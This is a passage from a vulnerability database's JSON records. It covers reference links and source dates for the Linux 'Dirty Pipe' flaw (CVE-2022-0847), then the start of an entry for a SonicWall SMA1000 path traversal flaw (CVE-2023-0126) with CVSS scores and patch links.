        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022042576"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166569/ubuntu-security-notice-usn-5362-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-0847/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166812/red-hat-security-advisory-2022-1476-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-file-write-via-dirty-pipe-37724"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2022-05-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0944"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.2981"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0965"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031421"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-0492"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-22942"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-0330"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2022-002"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0920"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4154"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0435"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25315"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25236"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25235"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23308"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23852"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22822"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22823"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0392"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0261"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22826"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3999"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0413"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23219"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22824"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-45960"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22825"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-46143"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0516"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0359"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0318"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4083"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21684"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-41190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4122"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22817"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1396"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0532"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21684"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24407"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0778"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0235"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0235"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0261"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0318"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0413"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0359"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0392"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0822"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0821"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0823"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0831"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0819"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "date": "2023-07-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "date": "2022-04-20T15:12:33",
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "date": "2022-03-29T15:53:19",
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "date": "2022-03-11T16:38:56",
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "date": "2022-03-11T16:39:27",
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "date": "2022-03-11T16:39:13",
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "date": "2022-03-11T16:31:15",
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "date": "2022-03-11T16:31:02",
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "date": "2022-03-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "date": "2022-03-10T17:44:57.283000",
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "date": "2023-07-12T06:29:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "date": "2022-08-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "date": "2024-07-02T17:05:01.307000",
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Initialization vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ],
    "trust": 0.6
  }
}

var-202301-1403
Vulnerability from variot

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. SMA1000 A path traversal vulnerability exists in firmware.Information may be obtained

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202301-1403",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2"
      },
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": null
      },
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": "sma1000  firmware  12.4.2"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      }
    ]
  },
  "cve": "CVE-2023-0126",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2023-0126",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2023-0126",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202301-1520",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. SMA1000 A path traversal vulnerability exists in firmware.Information may be obtained",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-0126",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "id": "VAR-202301-1403",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2023-12-18T12:15:03.998000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SNWLID-2023-0001",
        "trust": 0.8,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2023-0001"
      },
      {
        "title": "SonicWALL SMA1000 series Repair measures for path traversal vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=222618"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
